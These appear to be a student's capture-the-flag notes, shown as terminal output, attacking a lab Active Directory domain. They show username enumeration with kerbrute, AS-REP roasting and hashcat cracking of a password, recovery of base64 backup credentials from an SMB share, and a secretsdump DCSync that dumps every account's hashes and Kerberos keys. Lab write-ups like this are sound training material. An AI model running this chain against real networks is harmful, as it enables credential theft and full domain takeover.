#+TITLE: ad

* enum4linux

┌─[✗]─[root@parrot-virtual]─[~/haxx/ctf/thm/ad]
└──╼ # enum4linux -U -o 10.10.39.110
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/  ) on Sat Nov 14 09:26:49 2020

 ==========================
 |    Target Information    |
 ==========================
 Target ........... 10.10.39.110
 RID Range ........ 500-550,1000-1050
 Username ......... ''
 Password ......... ''
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


  ====================================================
  |    Enumerating Workgroup/Domain on 10.10.39.110    |
 ====================================================
 [E] Can't find workgroup/domain


  =====================================
  |    Session Check on 10.10.39.110    |
 =====================================
 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
 [+] Server 10.10.39.110 allows sessions using username '', password ''
 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
 [+] Got domain/workgroup name:

  ===========================================
  |    Getting domain SID for 10.10.39.110    |
 ===========================================
 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
 : THM-AD
 Domain Sid: S-1-5-21-3591857110-2884097990-301047963
 [+] Host is part of a domain (not a workgroup)

  ======================================
  |    OS information on 10.10.39.110    |
 ======================================
 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
 Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
 [+] Got OS info for 10.10.39.110 from smbclient:
 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
 [+] Got OS info for 10.10.39.110 from srvinfo:
 Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

  =============================
  |    Users on 10.10.39.110    |
 =============================
 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
 [E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

 Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
 [E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
 enum4linux complete on Sat Nov 14 09:27:05 2020

* /etc/hosts
- added the ip and the TLD for the Active Directory Domain
  : spookysec.local

* kerbrute
-interesting usernames
: svc-admin
: backp

#+begin_src bash

┌─[root@parrot-virtual]─[~/haxx/ctf/thm/ad]
└──╼ # ./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local userlist.txt -t 100

               / /_____  _____/ /_  _______  __/ /____
              / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
             / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
            /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

        Version: v1.0.3 (9dad6e1) - 11/14/20 - Ronnie Flathers @ropnop

        2020/11/14 09:50:35 >  Using KDC(s):
        2020/11/14 09:50:35 >   spookysec.local:88

        2020/11/14 09:50:35 >  [+] VALID USERNAME:       james@spookysec.local
        2020/11/14 09:50:40 >  [+] VALID USERNAME:       svc-admin@spookysec.local
        2020/11/14 09:50:41 >  [+] VALID USERNAME:       robin@spookysec.local
        2020/11/14 09:50:46 >  [+] VALID USERNAME:       James@spookysec.local
        2020/11/14 09:50:57 >  [+] VALID USERNAME:       darkstar@spookysec.local
        2020/11/14 09:50:58 >  [+] VALID USERNAME:       administrator@spookysec.local
        2020/11/14 09:51:00 >  [+] VALID USERNAME:       backup@spookysec.local
        2020/11/14 09:51:01 >  [+] VALID USERNAME:       paradox@spookysec.local
        2020/11/14 09:51:05 >  [+] VALID USERNAME:       JAMES@spookysec.local
        2020/11/14 09:51:06 >  [+] VALID USERNAME:       Robin@spookysec.local
        2020/11/14 09:51:14 >  [+] VALID USERNAME:       Administrator@spookysec.local
        2020/11/14 09:51:28 >  [+] VALID USERNAME:       Darkstar@spookysec.local
        2020/11/14 09:51:32 >  [+] VALID USERNAME:       Paradox@spookysec.local
        2020/11/14 09:51:46 >  [+] VALID USERNAME:       DARKSTAR@spookysec.local
        2020/11/14 09:51:50 >  [+] VALID USERNAME:       ori@spookysec.local
        2020/11/14 09:51:58 >  [+] VALID USERNAME:       ROBIN@spookysec.local
        2020/11/14 09:52:47 >  Done! Tested 100000 usernames (16 valid) in 132.607 seconds

#+end_src

* impacket GetNPUsers.py

$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:c1b863161c61cf9712fb1fb2afede37c$4b794336bad289c4d897b9aab2a9d23b773096603a78589dcd71ae6f2364407d8cb5b51f7048d21188b6a6f86dcef38f43f2b263dfbd7c8a3788792f8416d7884ed5a8e0c1f74d5b9cc874b1bf225edfd1f8b56ae0535a2ab3c867c33b36acd478cce7293b71738eeb80fd8239a739773d55aebe584358eb01ced223c5efdbe3d0254b5d8e1970910d3a2244d984a80b1e1e011c21f3dc29f8387867cc74a3b2f2caa77982a48b334b4f322dc14cf16eb6754c53eb01e592986d19dc0efeb90fd275bbb4449c238d9ff63e47394c4e9871d2dd0aedaea76b17fa0f5ce07b8c7fdfc3c55990b9f7d9a572a71eb7e9f01e87d9

┌─[✗]─[root@parrot-virtual]─[~/haxx/ctf/thm/ad/impacket]
└──╼ # python3 GetNPUsers.py spookysec.local/ -no-pass -usersfile ../users
Impacket v0.9.22.dev1+20201112.141202.d1ced941 - Copyright 2020 SecureAuth Corporation

[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:c1b863161c61cf9712fb1fb2afede37c$4b794336bad289c4d897b9aab2a9d23b773096603a78589dcd71ae6f2364407d8cb5b51f7048d21188b6a6f86dcef38f43f2b263dfbd7c8a3788792f8416d7884ed5a8e0c1f74d5b9cc874b1bf225edfd1f8b56ae0535a2ab3c867c33b36acd478cce7293b71738eeb80fd8239a739773d55aebe584358eb01ced223c5efdbe3d0254b5d8e1970910d3a2244d984a80b1e1e011c21f3dc29f8387867cc74a3b2f2caa77982a48b334b4f322dc14cf16eb6754c53eb01e592986d19dc0efeb90fd275bbb4449c238d9ff63e47394c4e9871d2dd0aedaea76b17fa0f5ce07b8c7fdfc3c55990b9f7d9a572a71eb7e9f01e87d9
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set

* hashcat

┌─[root@parrot-virtual]─[~/haxx/ctf/thm/ad]
└──╼ # hashcat -a 0 -m 18200 18200.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
 Device #1: pthread-Intel(R) Core(TM) i7-10875H CPU @ 2.30GHz, 4362/4426 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
 Zero-Byte
 Not-Iterated
 Single-Hash
 Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB

Dictionary cache built:
 Filename..: /usr/share/wordlists/rockyou.txt
 Passwords.: 14344392
 Bytes.....: 139921507
 Keyspace..: 14344385
 Runtime...: 1 sec

$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:c1b863161c61cf9712fb1fb2afede37c$4b794336bad289c4d897b9aab2a9d23b773096603a78589dcd71ae6f2364407d8cb5b51f7048d21188b6a6f86dcef38f43f2b263dfbd7c8a3788792f8416d7884ed5a8e0c1f74d5b9cc874b1bf225edfd1f8b56ae0535a2ab3c867c33b36acd478cce7293b71738eeb80fd8239a739773d55aebe584358eb01ced223c5efdbe3d0254b5d8e1970910d3a2244d984a80b1e1e011c21f3dc29f8387867cc74a3b2f2caa77982a48b334b4f322dc14cf16eb6754c53eb01e592986d19dc0efeb90fd275bbb4449c238d9ff63e47394c4e9871d2dd0aedaea76b17fa0f5ce07b8c7fdfc3c55990b9f7d9a572a71eb7e9f01e87d9:management2005

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.L...1e87d9
Time.Started.....: Sat Nov 14 10:29:51 2020 (6 secs)
Time.Estimated...: Sat Nov 14 10:29:57 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   963.3 kH/s (8.39ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5849088/14344385 (40.78%)
Rejected.........: 0/5849088 (0.00%)
Restore.Point....: 5832704/14344385 (40.66%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: mandj4e -> mama0312

Started: Sat Nov 14 10:29:23 2020
Stopped: Sat Nov 14 10:29:59 2020

* smbclient
- decoding
  ┌─[root@parrot-virtual]─[~/haxx/ctf/thm/ad]
  └──╼ # echo YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw > base64_encoded && cat base64_encoded | base64 -d > decoded && cat decoded
  : backup@spookysec.local:backup2517860

-file  backup_credentials.txt
: 3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

: smbclient -L 10.10.39.110 -U svc-admin
┌─[root@parrot-virtual]─[~/haxx/ctf/thm/ad]
└──╼ # smbclient -L 10.10.39.110 -U svc-admin
Enter WORKGROUP\svc-admin's password:

 Sharename       Type      Comment
 ---------       ----      -------
 ADMIN$          Disk      Remote Admin
 backup          Disk
 C$              Disk      Default share
 IPC$            IPC       Remote IPC
 NETLOGON        Disk      Logon server share
 SYSVOL          Disk      Logon server share
 SMB1 disabled -- no workgroup available

: smbclient \\\\10.10.39.110\\backup -U svc-admin

┌─[✗]─[root@parrot-virtual]─[~/haxx/ctf/thm/ad]
└──╼ # smbclient \\\\10.10.39.110\\backup -U svc-admin
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0  Sat Apr  4 15:08:39 2020
..                                  D        0  Sat Apr  4 15:08:39 2020
backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

8247551 blocks of size 4096. 4021973 blocks available
smb: \>

* impacket secretsdump.py
- admin
  :  Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

┌─[✗]─[root@parrot-virtual]─[~/haxx/ctf/thm/ad/impacket]
└──╼ # python3 secretsdump.py -dc-ip 10.10.39.110 spookysec.local/backup@10.10.39.110
Impacket v0.9.22.dev1+20201112.141202.d1ced941 - Copyright 2020 SecureAuth Corporation

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:f6360805011a6e136aa3a7f148606c79:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:663cd6165560728d68523414176931b116e4cc362a1660574546c51c34eba7d7
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:a8937dc0a1448d9c6ff87e04fcef1534
ATTACKTIVEDIREC$:des-cbc-md5:497a40a1fd4a616b
[*] Cleaning up...
